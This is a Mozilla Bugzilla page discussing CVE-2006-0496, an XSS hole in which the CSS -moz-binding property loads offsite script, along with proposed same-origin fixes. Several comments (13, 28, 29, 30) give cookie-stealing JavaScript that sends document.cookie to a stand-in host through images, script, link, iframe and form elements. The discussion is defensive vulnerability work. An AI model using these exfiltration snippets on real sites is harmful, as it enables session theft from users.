Last Comment Bug 324253 - CVE-2006-0496 Do something about the XSS issues -moz-binding introduces
: CVE-2006-0496 Do something about the XSS issues -moz-binding introduces
Status: RESOLVED FIXED
[sg:want P4] IE has similar issues wh...
:
Product: Core
Classification: Components
Component: XBL (show other bugs)
: Trunk
: x86 All
: -- major with 14 votes (vote)
: ---
Assigned To: Nobody; OK to take it and work on it
:
Mentors:
http://www.davidpashley.com/cgi/pyblo...
: 361554 425095 (view as bug list)
Depends on:
Blocks: xss CVE-2008-5503
  Show dependency treegraph
 
Reported: 2006-01-21 09:57 PST by Chris Thomas (CTho) [formerly cst@andrew.cmu.edu cst@yecc.com]
Modified: 2009-09-18 14:56 PDT (History)
63 users (show)
See Also:
Crash Signature:
(edit)
QA Whiteboard:
Iteration: ---
Points: ---
Has Regression Range: ---
Has STR: ---


Attachments
cookie-reading XBL (983 bytes, text/xml)
2006-01-21 15:48 PST, Daniel Veditz [:dveditz]
no flags Details
cookie-reading behavior (IE) (512 bytes, text/plain)
2006-01-21 15:58 PST, Daniel Veditz [:dveditz]
no flags Details
exploit (load from another domain) from ydnar (699 bytes, text/html)
2006-01-21 16:06 PST, Daniel Veditz [:dveditz]
no flags Details
css with expression (IE) (134 bytes, text/css)
2006-01-22 22:16 PST, Daniel Veditz [:dveditz]
no flags Details
expression XSS exploit (IE) (693 bytes, text/html)
2006-01-22 22:19 PST, Daniel Veditz [:dveditz]
no flags Details

Description Chris Thomas (CTho) [formerly cst@andrew.cmu.edu cst@yecc.com] 2006-01-21 09:57:50 PST
From the URL:
"Late last week we become aware that it was possible to use the "-moz-binding" CSS attribute within Mozilla and Mozilla Firefox to execute arbitrary offsite JavaScript. As this attribute is designed to allow attaching an XBL transform and JavaScript to any node within the DOM, it is quite easy to use in a malicious fashion. We immediately altered our cleaner to strip this attribute from entries and comments, though also realized that wasn't even half the battle."
Comment 1 Boris Zbarsky [:bz] (Out June 25-July 6) 2006-01-21 10:07:00 PST
Do what something?  Disallow binding of XBL via CSS?  That's the only thing that would help the Livejournal folks.
Comment 2 David Baron :dbaron: ⌚️UTC-7 (review requests must explain patch) 2006-01-21 10:17:10 PST
Do a same-origin check based on the location of the XBL?
Comment 3 Boris Zbarsky [:bz] (Out June 25-July 6) 2006-01-21 10:27:32 PST
That would break an actual desired use case of XBL, which is allowing people to host "packages" of some sort that other people use, no?
Comment 4 Daniel Veditz [:dveditz] 2006-01-21 15:48:34 PST
Created attachment 209238 [details]
cookie-reading XBL
Comment 5 Daniel Veditz [:dveditz] 2006-01-21 15:58:04 PST
Created attachment 209240 [details]
cookie-reading behavior (IE)
Comment 6 Daniel Veditz [:dveditz] 2006-01-21 16:06:43 PST
Created attachment 209241 [details]
exploit (load from another domain) from ydnar

Load this testcase from another domain, in both Firefox and IE. In IE the behavior is blocked, in Firefox it still works. For "another domain" you can use the IP address of bugzilla, or the true hostname (currently https://recluse.mozilla.org)
Comment 7 Daniel Veditz [:dveditz] 2006-01-21 16:29:12 PST
(In reply to comment #3)
> [A same-origin check] would break an actual desired use case of XBL, which is
> allowing people to host "packages" of some sort that other people use, no?

Desired by whom? It sounds nice in theory, but no site with anything of even slight value would rely on external scripts outside their control. Even ignoring the security aspects no one's going to want the correct functioning of their site to depend on a 3rd party not breaking something.

I can see possibilities of a CPAN-like package repository, but as a distributor for locally-hosted bindings, not their live host.

The one realistic use-case might be a corporate style repository, which could perhaps be handled through document.domain.

Bindings do more than run scripts, we might not have to ban remote XBL outright if we can disable the scripts or prevent them from accessing anything outside the binding itself.
Comment 8 Boris Zbarsky [:bz] (Out June 25-July 6) 2006-01-21 16:34:40 PST
Note that there has been a good deal of discussion on cross-domain application of XBL in netscape.public.mozilla.xbl over the last few months.
Comment 9 Jesse Ruderman 2006-01-21 16:48:32 PST
> In IE the behavior is blocked, in Firefox it still works.

Under what conditions does IE block behaviors?  Whenever the CSS is on a different domain than the page?  Whenever the .htc file is on a different domain than the page?
Comment 10 Jesse Ruderman 2006-01-21 16:50:41 PST
Could we give sites a way to opt in or opt out of XBL when they link to stylesheets?  e.g. <link rel="stylesheet xbl"> or <link rel="stylesheet noxbl">.  Perhaps it could default to allowed for same-site stylesheets and disallowed for off-site stylesheets.
Comment 11 dolphinling 2006-01-21 23:42:18 PST
Another major case here is the many sites that don't link to stylesheets, but let you type out <style> tags yourself. To properly protect those, (the ones that don't even know XBL exists and therefore don't know to filter it,) XBL would have to be entirely disallowed in that type of stylesheet.

Is that a case we're going to try to do something about, or are we going to say "they _can_ filter it, so it's their problem"?
Comment 12 Benjamin Smedberg [:bsmedberg] 2006-01-22 06:21:55 PST
Can style itself cause XSS attacks through javascript: URIs?
Comment 13 Boris Zbarsky [:bz] (Out June 25-July 6) 2006-01-22 09:27:38 PST
Yes, of course.  With bug 33961 and bug 302618 fixed, something like:

data:text/html,<div style="background: url('javascript:alert(document.cookie)')">

alerts an empty cookie... but of course if it were in a LiveJournal page it would alert the actual cookie.

Note the argument between dbaron and brendan about the whole javascript: thing in bug 33961...
Comment 14 David Baron :dbaron: ⌚️UTC-7 (review requests must explain patch) 2006-01-22 10:16:06 PST
Did you test it?  All I get is
  Error: uncaught exception: Permission denied to get property Window.alert

And even if I didn't get a permission error, what global object would said javascript: URL have access to?
Comment 15 Boris Zbarsky [:bz] (Out June 25-July 6) 2006-01-22 10:30:06 PST
> Did you test it?

Yes, of course...  I do seem to get inconsistent results in different builds; the alert worked fine in a 2006-01-18-05 build.  The same build with a different profile gives the security exception you cited, however.  The profile I was using doesn't have any prefs set that would loosen this security restriction that I can think of; I'll try to narrow down what the key difference between the two profiles is.

> And even if I didn't get a permission error, what global object would said
> javascript: URL have access to?

The one that lives in the docshell that the loadgroup involved belongs to.  See the patch that fixed bug 302618.
Comment 16 Boris Zbarsky [:bz] (Out June 25-July 6) 2006-01-22 10:38:18 PST
Ah, I see the difference.  You have to load the data: URI into a brand-new window or tab that's had nothing loaded in it before; then the alert works.  I can confirm that putting that HTML into an actual file and loading the file:// URI gives a security exception.
Comment 17 Boris Zbarsky [:bz] (Out June 25-July 6) 2006-01-22 10:46:00 PST
Ah, so what's saving us is the code at http://lxr.mozilla.org/seamonkey/source/dom/src/jsurl/nsJSProtocolHandler.cpp#245 (and the special-casing of about:blank there is what let my original data: URI work).  OK, good.  ;)
Comment 18 bradfitz 2006-01-22 11:51:20 PST
Hello, this is Brad Fitzpatrick from LiveJournal.

Just to clear up any confusion:  we do have a very strict HTML sanitizer.  But we made the decision (years ago) to allow users to host CSS files offsite because... why not?  It's just style declarations, right?

But then came along behavior, expression, -moz-binding, etc, etc...

Now CSS is full of JavaScript.  Bleh.

But Internet Explorer has two huge advantages over Mozilla:

-- HttpOnly cookies (Bug 178993), which LiveJournal sponsored for Mozilla, over a year ago.  Still not in tree.

-- same-origin restrictions, so an offsite behavior/binding can't mess with the calling node's DOM/Cookies/etc.

Either one of these would've saved our ass.

Now, I understand the need to innovate and add things like -moz-bindings, but please keep in mind the authors of webapps which are fighting a constant battle to improve their HTML sanitizers against new features which are added to browser.

What we'd REALLY love is some document meta tag or HTTP response header that declares the local document safe from all external scripts.  HttpOnly cookies are such a beautiful idea, we'd be happy with just that, but Comment 10 is also a great proposal... being able to declare the trust level, effectively, of external resources.  Then our HTML cleaner would just insert/remove the untrusted/trusted, respectively.

Thanks for discussing this.  I'm following with much interest.
Comment 19 Six Apart, Ltd. 2006-01-22 12:01:32 PST
(from ydnar@sixapart.com)

+1 on privilege reduction, whether it's an HTTP header, meta/other tag in <head> or a link rel.  Even if Mozilla didn't support HttpOnly cookies, if there was a header that effectively disabled read access to document.cookie, it would be as effective.

If Moz & Microsoft can agree on SSL/anti-phishing policy and an RSS icon, is consensus on scripting security policy too hard to imagine?
Comment 20 Brendan Eich [:brendan] 2006-01-22 13:14:53 PST
(In reply to comment #19)
> If Moz & Microsoft can agree on SSL/anti-phishing policy

Don't believe MS blog spin.  Because we are participating with other browser vendors and CAs in some meetings does not mean that we will do whatever MS proposes, and it's misleading to imply that some sort of shared standard for new SSL UI exists yet.  We have not agreed with MS to do anything for either SSL or anti-phishing, and what MS proposes to do looks to me like a bad idea.

> and an RSS icon,

In contrast to SSL/anti-phishing, that was not a case of agreement on something new, rather of Firefox spreading an image that was being used freely on websites to mean "RSS spoken here" -- a _de facto_ standard.

HttpOnly is an analogous case but with IE leading the way, and I personally think we should support it.  But note that it doesn't solve everything.  See bug 178993 comment 47.

> is consensus on scripting security policy too hard to imagine?

Talk is cheap.  Let's get back to the bug, and put the advocacy elsewhere.

/be
Comment 21 Daniel Veditz [:dveditz] 2006-01-22 22:16:59 PST
Created attachment 209329 [details]
css with expression (IE)
Comment 22 Daniel Veditz [:dveditz] 2006-01-22 22:19:58 PST
Created attachment 209330 [details]
expression XSS exploit (IE)
Comment 23 Jesse Ruderman 2006-01-22 22:39:49 PST
The last attachment works cross-domain for me in IE.
Comment 24 Daniel Veditz [:dveditz] 2006-01-22 22:49:35 PST
(In reply to comment #18)
> But Internet Explorer has two huge advantages over Mozilla:
> -- same-origin restrictions, so an offsite behavior/binding can't mess with
> the calling node's DOM/Cookies/etc.

That's true for behaviors but not, apparently, expressions. In IE
- load this bug as https://recluse.mozilla.org/show_bug.cgi?id=324253
  (hostname may differ in the future) 
- get some cookies, cut and paste the following into the address bar:
  javascript:document.cookie='foo=blah';void(0);
- load the expression XSS exploit attachment

The external bugzilla.m.o expression can see the recluse.m.o cookies and affect the DOM. expressions appear to be somewhat fragile (variants on this testcase failed or sometimes caused IE to hang), it may not be possible to write a complex enough script as an expression to get around the httpOnly cookies.

> I understand the need to innovate and add things like -moz-bindings, but please
> keep in mind the authors of webapps which are fighting a constant battle

When we add potentially dangerous new features we ought to require webpages to affirmatively assert they want to use them in a new meta tag or processing instruction in the <head> section. Sites that are using the features can easily flip the switch, and sites that aren't aware of the security implications don't have to worry about getting blindsided, possibly by features that didn't exist when the site was written.
Comment 25 Martin Atkins 2006-01-26 10:42:02 PST
I think an obvious solution for implementing origin restrictions on XBL while
still allowing the use of off-site component libraries is to give off-site
XBL bindings access only to the magic internal DOM created by the XBL scripts
and to the elements in the "real" DOM that descend from the script with the
binding. This way the component can do what it likes to itself but can't affect
the containing document and, most importantly, it can't get at the "document"
object in order to get the cookies out of it.

Of course, not being familiar with how Mozilla's security model operates, I
can't really comment on how feasible such granular restrictions are within
the DOM. Hopefully someone can enlighten me.
Comment 26 Boris Zbarsky [:bz] (Out June 25-July 6) 2006-01-26 10:45:03 PST
At the moment such restrictions are impossible.  The security model would have to be rearchitected completely to allow it.  See the discussion on this that already happened in n.p.m.xbl.
Comment 27 Juha-Matti Laurio 2006-02-01 18:50:53 PST
This has been assigned to 
http://www.frsirt.com/english/advisories/2006/0403
Comment 28 Yuriy Krylov 2006-02-02 07:25:59 PST
What are the possible attack vectors for this volnurability?

It seems that the hack has to obtain knowledge of the server side code in order to exploit the -moz-binding property.  Even if the hacker can force some cookie-sniffing code to be executed on a victim's client how can this sensitive information be relaid to the hacker?

One line of thinking is executing a xmlhttp POST, something like:

function postToEvilServer(data,element)
   {
    
    this.evilElement.innerHTML = 'About to send your cookie data to '+this.evilURL+' via '+this.evilMode+' method!';
    try {
     netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");
     xmlhttp = new XMLHttpRequest();
     xmlhttp.onreadystatechange=displayStatus;
     xmlhttp.open(this.evilMode,this.evilURL,true);
     xmlhttp.send(data);
    } catch(e) {
     this.evilElement.innerHTML = e;
    }
   } 

Unless the hacker is relaying information to the same domain (is this what LiveJournal is worried about?), mozilla should throw a "Permission denied to call method XMLHttpRequest.open" without the netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead"); declaration. Then there is signed.applets.codebase_principal_support runtime property which, if set to false will disallow Universal Browser Read privs and error:  "A script from 'http://${victim_host}' was denied UniversalBrowserRead privileges."

If signed.applets.. is set to true, mozilla will still prompt the user with a " A script from ${host} is requesting enhanced abilities that are UNSAFE and could be used to compromise your machine or data".  The user is given choice to Allow or Deny as well as remember the decision.

It seems that alot of mistakes have to be made by the user to allow cookie info to go out across a domain.

Again this is just one attack vector, what is missing in this analysis?  Thanks very much for your feedback!
Comment 29 Alex Kapranoff 2006-02-02 07:37:25 PST
(In reply to comment #28)
> to exploit the -moz-binding property.  Even if the hacker can force some
> cookie-sniffing code to be executed on a victim's client how can this sensitive
> information be relaid to the hacker?

E.g, we have perfectly working images.

function steal_cookie
{
  an_img.src = evil_url + '?' + document.cookie;
}
Comment 30 Six Apart, Ltd. 2006-02-02 10:48:40 PST
There are plenty of ways a script can send (and recieve) data from a webpage:

* the aforementioned new Image() method

* creating script nodes:
    var s = document.createElement( "script" );
    s.setAttribute( "type", "text/javascript" );
    s.setAttribute( "src", "http://www.example.com/dump?" + document.cookie );
    document.getElementsByTagName( "head" )[ 0 ].appendChild( s );

* creating link nodes:
    var s = document.createElement( "link" );
    s.setAttribute( "type", "text/css" );
    s.setAttribute( "rel", "stylesheet" );
    s.setAttribute( "href", "http://www.example.com/dump?" + document.cookie );
    document.getElementsByTagName( "head" )[ 0 ].appendChild( s );

* creating iframes:
    var s = document.createElement( "iframe" );
    s.style.position = "absolute";
    s.style.left = s.style.top = "-1px";
    s.style.width = s.style.height = "0";
    s.style.border = "0";
    s.setAttribute( "src", "http://www.example.com/dump?" + document.cookie );
    document.body.appendChild( s );

* creating iframe and then POSTing data to it:
    (as above)
    s.setAttribute( "name", "__exploit" );
    var f = document.createElement( "form" );
    var i = document.createElement( "input" );
    i.setAttribute( "type", "hidden" );
    i.setAttribute( "target", "__exploit" );
    i.setAttribute( "value", document.cookie );
    f.appendChild( i );
    document.body.appendChild( f );
    f.submit();

* create iframe, write a shell document to it with a foreign stylesheet,
  and read data back from the foreign server by walking the iframe's DOM
Comment 31 Yuriy Krylov 2006-02-02 11:48:00 PST
Thanks very much for these!

(In reply to comment #30)
> There are plenty of ways a script can send (and recieve) data from a webpage:
> * the aforementioned new Image() method
> * creating script nodes:
>     var s = document.createElement( "script" );
>     s.setAttribute( "type", "text/javascript" );
>     s.setAttribute( "src", "http://www.example.com/dump?" + document.cookie );
>     document.getElementsByTagName( "head" )[ 0 ].appendChild( s );
> * creating link nodes:
>     var s = document.createElement( "link" );
>     s.setAttribute( "type", "text/css" );
>     s.setAttribute( "rel", "stylesheet" );
>     s.setAttribute( "href", "http://www.example.com/dump?" + document.cookie );
>     document.getElementsByTagName( "head" )[ 0 ].appendChild( s );
> * creating iframes:
>     var s = document.createElement( "iframe" );
>     s.style.position = "absolute";
>     s.style.left = s.style.top = "-1px";
>     s.style.width = s.style.height = "0";
>     s.style.border = "0";
>     s.setAttribute( "src", "http://www.example.com/dump?" + document.cookie );
>     document.body.appendChild( s );
> * creating iframe and then POSTing data to it:
>     (as above)
>     s.setAttribute( "name", "__exploit" );
>     var f = document.createElement( "form" );
>     var i = document.createElement( "input" );
>     i.setAttribute( "type", "hidden" );
>     i.setAttribute( "target", "__exploit" );
>     i.setAttribute( "value", document.cookie );
>     f.appendChild( i );
>     document.body.appendChild( f );
>     f.submit();
> * create iframe, write a shell document to it with a foreign stylesheet,
>   and read data back from the foreign server by walking the iframe's DOM

Comment 32 Brendan Eich [:brendan] 2006-02-02 12:10:38 PST
(In reply to comment #26)
> At the moment such restrictions are impossible.  The security model would have
> to be rearchitected completely to allow it.  See the discussion on this that
> already happened in n.p.m.xbl.

"Rearchitected completely" is too strong.  The JS engine has the necessary hooks, but we don't implement them for all objects that may be connected by edges in the DOM, only for articulation points such as windows, and for certain hard cases.  We suspect the costs of the current CAPS implementation would go up unacceptably too, if we started using it across more edges.  But this could be optimized again.

We should talk more about this elsewhere.  What Martin Atkins proposed is clean in concept, at least so far -- if someone sees a hole in the idea, please speak up.  If the problems we associate with it have only to do with implementation hardship, we can redesign and optimize over time to make it work securely and efficiently.

/be
Comment 33 Yuriy Krylov 2006-02-02 16:47:42 PST
Brendan - what is the best way/place to continue this discussion? Thanks for you help!

All - from my own tests, without resorting to disabling javascript image src injection seems to be the only exploit with a workaround:

network.image.imageBehavior set to 1 to allow load from same domain only
dom.disable_image_src_set turn off to disable all javascript manipulation of src

Are there similar workarounds for the other scenarios mentioned by Six Apart and Alex? Beyond phishing how else can an exploit be exercised by maliscious entity?
Comment 34 Benjamin Smedberg [:bsmedberg] 2006-11-22 11:22:24 PST
*** Bug 361554 has been marked as a duplicate of this bug. ***
Comment 35 Ted Kandell 2007-03-19 20:50:48 PDT
Here's something else to consider when attempting to "fix" this bug by restricting XBL script execution to the same domain as the originating page:

There is a legitimate use of cross-site scripting when altering a page source by injecting an off-site script using Greasemonkey. Greasemonkey's GM_xmlhttpRequest() allows Greasemonkey scripts to take advantage of AJAX across sites to create mixed-site content webpages. The page source can also be altered to insert CSS (stylesheets) and scripts that originate off-site as well. 

This is actually rather critical for a particular application that I'm developing. I have a very large image map, with about 3500 'area' tags, where only those that have an "alt" attribute (about 2000) have to be modified to insert a mouseover event handler. One way of doing this is to run an XPath query and get a result set, and iterate over each of these areas to insert an "onmouseover" attribute. (Adding an event handler as a function reference to each area won't work, because Greasemonkey runs in a sandbox and the runtime script functions / method references aren't available to the Greasemonkey script when it executes "onload".) Adding these "onmouseover"s takes about 3 minutes on each page load (with the larges possible image map, on the initial results page) partly because these have to be added individually using a setTimeout() so that the browser doesn't lock up while executing this loop.

Cross-site XBL scripting nicely solves this problem. The same added cross-site stylesheet that gets added by the Greasemonkey script also adds a behavior (referencing an off-site XBL file) to these 2000 elements with the selector "area[alt]" upon the final page initialization after the Greasemonkey script exits. What are added are mouseover events that are merely function references, and instead of taking minutes to add all of them, adding these to the DOM area elements happens practically instantaneously. (These mouseovers in turn add a sizable amount of data in the form of attributes to each area element as needed, which is taken from an over 1Mb JSON file which basically functions as a substitute for a database table. This means that all the separate data is integrated into the original page without any noticeable delay for the end-user, on the first mouseover of each area element - the only data that gets added to the page is that which the user actually accesses as needed, which will be generally only a few of the 2000 area elements.) 

I can see this becoming critical for many Greasemonkey and AJAX applications that need to alter large numbers of elements on very large webpages. This doesn't just include adding event handlers, but fields as well, since it isn't possible to retrieve additional data joined with an element at runtime via a cross-site AJAX call - that is without running a separate server as a proxy which assembles the data behind the scenes before the page is served.

Altering webpages within the browser using Greasemonkey is really the only workaround for the legitimate cross-site restriction on XMLHttpRequest calls. 
Remember that the end-user is the one that actively installs Greasemonkey scripts, and is always able to see and read the source for themselves - and that these scripts are generally hosted on open-source sites, where they can be examined by everyone (e.g. userscripts.org). Therefore it's rather difficult (at least up until now) to publicly post a malicious or deceptive Greasemonkey script without being detected and personally held responsible. A very different situation from the typical anonymous cross-site scripting attack.

It is indeed true that XBL itself was designed to enable other sites to add data and functionality to existing webpages, and not just to pages in the same domain. This is also the definition of cross-site scripting - so it seems, as has been mentioned, that the very design of XBL contains what could be described as a "security flaw". 

Is there any way to maintain this separation of data, presentation, and functionality while maintaining security? Think of the day that's coming soon where there will only be XML files, representing just data without any presentation whatsoever (Service Oriented Architecture / SOA) that originate all over (even now there are RSS feeds which are exactly that), CSS files to provide the presentation for the XML data, and XBL files to add behaviors to these data elements and create new widgets using XUL and SVG. How can we get to the point of this sort of code and data reuse with same-domain restrictions?

Can anyone give examples of sites and pages that do just that, that integrate large XML remote files / RSS feeds and present them without any HTML at all, just using CSS / XBL / XUL / SVG? I'd like other folks to comment on how a cross-site XBL restriction would affect their sites that follow this architecture.

I can think of one possible suggestion to improve security:
A sort of prompt by the browser to "allow cross-site scripting" for a given domain on another domain, similar to prompting for permission to "install software" or allow popups that adds that site / site combination to a whitelist. These too are potentially dangerous actions that at times need to be allowed for certain particular sites. Also, think of the the way that NoScript allows scripts on webpages originating from certain domains and not others. 

Could this sort of whitelist also ease the restriction on cross-domain XMLHttpRequest calls as well? What do people think of this idea?

The Greasemonkey script, which is rather complex, lives at:
http://userscripts.org/scripts/show/7101

The relevant JS, CSS, and XBL files are at:
http://members.cox.net/tkandell/mtDNA/roots/snps.css
http://members.cox.net/tkandell/mtDNA/roots/snps.xml
http://members.cox.net/tkandell/mtDNA/roots/snps.js
http://members.cox.net/tkandell/mtDNA/roots/crs.js






(This is still in beta and may at times be broken, but after running this script 
Comment 36 :Gavin Sharp [email: gavin@gavinsharp.com] 2008-03-25 17:31:41 PDT
*** Bug 425095 has been marked as a duplicate of this bug. ***
Comment 37 Boris Zbarsky [:bz] (Out June 25-July 6) 2009-02-08 07:05:17 PST
We do a same-origin check on XBL loads now.  See bug 379959.

Note You need to log in before you can comment on or make changes to this bug.